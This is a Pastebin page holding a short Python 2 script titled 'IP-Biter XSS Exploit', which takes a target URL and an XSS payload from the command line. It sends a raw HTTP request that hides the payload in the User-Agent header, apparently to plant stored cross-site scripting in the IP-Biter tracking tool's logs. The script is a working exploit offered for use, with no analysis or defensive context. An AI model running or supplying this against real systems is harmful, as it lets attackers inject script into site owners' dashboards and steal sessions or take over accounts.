Advertisement
rena123

IP-Biter XSS Exploit

Nov 14th, 2018
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.01 KB | None | 0 0
  1. import socket
  2. from sys import argv
  3.  
  4. def parse_url(target_url):
  5.     start = target_url.find("://")
  6.     strip_url = target_url[start + 3:] if start != -1 else target_url
  7.     return strip_url.split('/', 1)
  8.  
  9.  
  10. if len(argv) != 3:
  11.     print "usage: python %s '<target_url>' '<xss_payload>'" % argv[0]
  12.     exit(1)
  13.  
  14. domain_name, path = parse_url(argv[1])
  15. xss_payload = argv[2]
  16.    
  17. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18. addr = socket.gethostbyname(domain_name)
  19. s.connect((addr, 80))
  20.  
  21. request = [
  22. "GET /%s HTTP/1.1" % path,
  23. "Host: %s" % domain_name,
  24. "User-Agent: %sMozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" % xss_payload,
  25. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  26. "Accept-Language: en-US,en;q=0.5",
  27. "Accept-Encoding: gzip, deflate",
  28. "Connection: close" ]
  29.  
  30. http_request = "\r\n".join(request)
  31. http_request += "\r\n\r\n"
  32.  
  33. s.sendall(http_request)
  34. s.recv(4096)
  35. s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement